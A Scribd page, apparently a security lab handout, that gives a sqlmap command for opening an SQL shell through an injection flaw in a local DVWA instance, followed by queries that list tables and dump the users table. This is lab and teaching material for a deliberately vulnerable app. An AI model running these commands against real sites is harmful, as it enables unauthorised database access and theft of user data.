SQL Shell

The document provides a series of SQL commands executed using sqlmap to interact with a vulnerable database. It includes commands to display the current database, list table names, retrieve data from specific tables, count records, and group data by user attributes. The commands are specifically targeting the 'dvwa' database and its 'users' and 'guestbook' tables.

Uploaded by

Rajashekar Bhimanathini

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

103 views1 page

SQL Shell

Uploaded by

Rajashekar Bhimanathini

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 1

sqlmap -u 'http://127.8.0.1/vulnerabilities/sqli/?

id=1&Submit=Submit#' --
cookie='PHPSESSID=qhj2pmck3k9gnmbn5ahvg80ok7; security=low' --sql-shell -
-batch

After gaining access:

Command:
sql-shell> database();
Explanation: Displays the name of the current database in use.

Command:
sql-shell> SELECT table_name FROM information_schema.tables WHERE
table_schema = 'dvwa';
Explanation: Lists all table names within the dvwa database.

Command:
sql-shell> SELECT * FROM dvwa.users;
Explanation: Retrieves all rows and columns from the users table in the
dvwa database.

Command:
sql-shell> SELECT * FROM dvwa.guestbook;
Explanation: Retrieves all rows and columns from the guestbook table in
the dvwa database.

Command:
sql-shell> SELECT COUNT(*) FROM dvwa.users;
Explanation: Counts the total number of records in the users table.

Command:
sql-shell> SELECT * FROM dvwa.users LIMIT 5;
Explanation: Retrieves the first 5 records from the users table.

Command:
sql-shell> SELECT COUNT(*), first_name FROM dvwa.users GROUP BY
first_name;
Explanation: Groups user records by first_name and displays the count of
each group.

Command:
sql-shell> SELECT column_name, data_type FROM information_schema.columns
WHERE table_name = 'users';
Explanation: Lists the column names and their data types from the users
table.

PR 6
No ratings yet
PR 6
5 pages
LAB - Chapter 9 - Database Security
No ratings yet
LAB - Chapter 9 - Database Security
9 pages
Chapter 9 - LAB - Database Security
No ratings yet
Chapter 9 - LAB - Database Security
8 pages
SQLMap Tutorial
No ratings yet
SQLMap Tutorial
2 pages
Week 4 - Automated SQL Injection
No ratings yet
Week 4 - Automated SQL Injection
6 pages
Automate SQL Injection with SqlMap
No ratings yet
Automate SQL Injection with SqlMap
18 pages
Sqlmap CASE STUDY
No ratings yet
Sqlmap CASE STUDY
19 pages
SQLMap Hashing
No ratings yet
SQLMap Hashing
6 pages
Skskksks
No ratings yet
Skskksks
25 pages
Dvwa SQL Injection Lab
No ratings yet
Dvwa SQL Injection Lab
9 pages
SQL Injection Guide for Developers
No ratings yet
SQL Injection Guide for Developers
11 pages
SQL Injection Authentication Bypass Method:: Chinni Diwakar
No ratings yet
SQL Injection Authentication Bypass Method:: Chinni Diwakar
21 pages
Lab - Injection Attacks: Objectives
0% (1)
Lab - Injection Attacks: Objectives
6 pages
SQL Injection - Sqlmap
No ratings yet
SQL Injection - Sqlmap
11 pages
Bug Bounty Training Program
No ratings yet
Bug Bounty Training Program
28 pages
This Article Explains How To Test Whether A Website Is Safe From SQL Injection Using The SQLMAP Penetration Testing Tool
No ratings yet
This Article Explains How To Test Whether A Website Is Safe From SQL Injection Using The SQLMAP Penetration Testing Tool
10 pages
Sqlmap Cheatsheet
No ratings yet
Sqlmap Cheatsheet
2 pages
SQL Injection Lab
No ratings yet
SQL Injection Lab
11 pages
SQL Injection Attack Demonstration
No ratings yet
SQL Injection Attack Demonstration
9 pages
Operation Sheet 4.1 - SQLInjection
No ratings yet
Operation Sheet 4.1 - SQLInjection
12 pages
SQL Injection
No ratings yet
SQL Injection
7 pages
Ethical Hacking SQL MAP
No ratings yet
Ethical Hacking SQL MAP
7 pages
Sqlmap - By-22011556-105
No ratings yet
Sqlmap - By-22011556-105
22 pages
SQL Injection & John the Ripper Lab
No ratings yet
SQL Injection & John the Ripper Lab
17 pages
Topic 6b - Web Application SQL Injection Testing - Using Sqmap
No ratings yet
Topic 6b - Web Application SQL Injection Testing - Using Sqmap
10 pages
Lab 03 SQL Vulnerabilities
No ratings yet
Lab 03 SQL Vulnerabilities
4 pages
Lab7 Thai SE161457
No ratings yet
Lab7 Thai SE161457
13 pages
SQL Injection Testing Guide
No ratings yet
SQL Injection Testing Guide
11 pages
SQLMAP Lab - 2 Virtual Machine Option
No ratings yet
SQLMAP Lab - 2 Virtual Machine Option
11 pages
SQL Injection
No ratings yet
SQL Injection
9 pages
SQLMap: Automate SQL Injection Testing
No ratings yet
SQLMap: Automate SQL Injection Testing
2 pages
Topic 5C - SQL Injection Using Sqlmap
No ratings yet
Topic 5C - SQL Injection Using Sqlmap
10 pages
SQL Injection
No ratings yet
SQL Injection
12 pages
SQL Injection Attack
No ratings yet
SQL Injection Attack
4 pages
SQL Injection for Pen Testers
No ratings yet
SQL Injection for Pen Testers
23 pages
Pentestmonkey: Mysql SQL Injection Cheat Sheet
No ratings yet
Pentestmonkey: Mysql SQL Injection Cheat Sheet
3 pages
20bce1965 Lab10
No ratings yet
20bce1965 Lab10
11 pages
008 SQL-Injection-DVWA-Low-Medium
No ratings yet
008 SQL-Injection-DVWA-Low-Medium
12 pages
Lab - SQL Injection Attack Using SQLMap
No ratings yet
Lab - SQL Injection Attack Using SQLMap
7 pages
MySQL SQL Injection Cheat Sheet
No ratings yet
MySQL SQL Injection Cheat Sheet
3 pages
SQL Injection On Dvwa and Acunteix Assessment Report: Assignment-4
No ratings yet
SQL Injection On Dvwa and Acunteix Assessment Report: Assignment-4
28 pages
DVWA Setup & Web Attack Guide
No ratings yet
DVWA Setup & Web Attack Guide
16 pages
Task 20 To Task 29
No ratings yet
Task 20 To Task 29
12 pages
SQL Injection Guide with Kali Linux
No ratings yet
SQL Injection Guide with Kali Linux
7 pages
Pentestmonkey
No ratings yet
Pentestmonkey
5 pages
SQL Injection & XSS in DVWA Guide
No ratings yet
SQL Injection & XSS in DVWA Guide
23 pages
Advanced SQL Injection Techniques
No ratings yet
Advanced SQL Injection Techniques
14 pages
ContentType Injection
No ratings yet
ContentType Injection
12 pages
MSSQL Injection Cheat Sheet
No ratings yet
MSSQL Injection Cheat Sheet
5 pages
Exploiting SQL Injection Vulnerabilities
No ratings yet
Exploiting SQL Injection Vulnerabilities
23 pages
Query Gate Write-Up: Database
No ratings yet
Query Gate Write-Up: Database
8 pages
Summary SQLMap Testing SQL Database Vulnerabilities
No ratings yet
Summary SQLMap Testing SQL Database Vulnerabilities
2 pages
SQLMap
No ratings yet
SQLMap
3 pages
Sqlmap Cheat Sheet
No ratings yet
Sqlmap Cheat Sheet
12 pages
Lab 9 - Automated SQL Injection Using SQLMap
No ratings yet
Lab 9 - Automated SQL Injection Using SQLMap
1 page
Performing SQL Injection
No ratings yet
Performing SQL Injection
8 pages
SQLMAP
No ratings yet
SQLMAP
5 pages
SQLMAP Website Hacking Guide
100% (1)
SQLMAP Website Hacking Guide
5 pages
SQL Injection Is A Code Injection Technique That Exploits A Security Vulnerability Occurring in The Database Layer of An Application
100% (2)
SQL Injection Is A Code Injection Technique That Exploits A Security Vulnerability Occurring in The Database Layer of An Application
6 pages
Color Spot Holding SchedulesStatements
No ratings yet
Color Spot Holding SchedulesStatements
64 pages
7 Maths Part2 2022-23
No ratings yet
7 Maths Part2 2022-23
258 pages
PG (CBCS) - Iv Sem Time Table - July - 2025
No ratings yet
PG (CBCS) - Iv Sem Time Table - July - 2025
5 pages
6 Maths Part - 1 2022-23
No ratings yet
6 Maths Part - 1 2022-23
270 pages
6 Maths Part-2 2022-23
No ratings yet
6 Maths Part-2 2022-23
202 pages
Telephone Directory Foss Updated
No ratings yet
Telephone Directory Foss Updated
56 pages
Protocals: Um Interface
No ratings yet
Protocals: Um Interface
7 pages
India's Flag Code Guide
No ratings yet
India's Flag Code Guide
10 pages
2020WCDW RT89
No ratings yet
2020WCDW RT89
2 pages
Perfect
No ratings yet
Perfect
10 pages
Codevita Season Vi - Open For Registrations!!
No ratings yet
Codevita Season Vi - Open For Registrations!!
5 pages

SQL Shell

Uploaded by

SQL Shell

Uploaded by

sqlmap -u 'http://127.8.0.1/vulnerabilities/sqli/?

After gaining access:

You might also like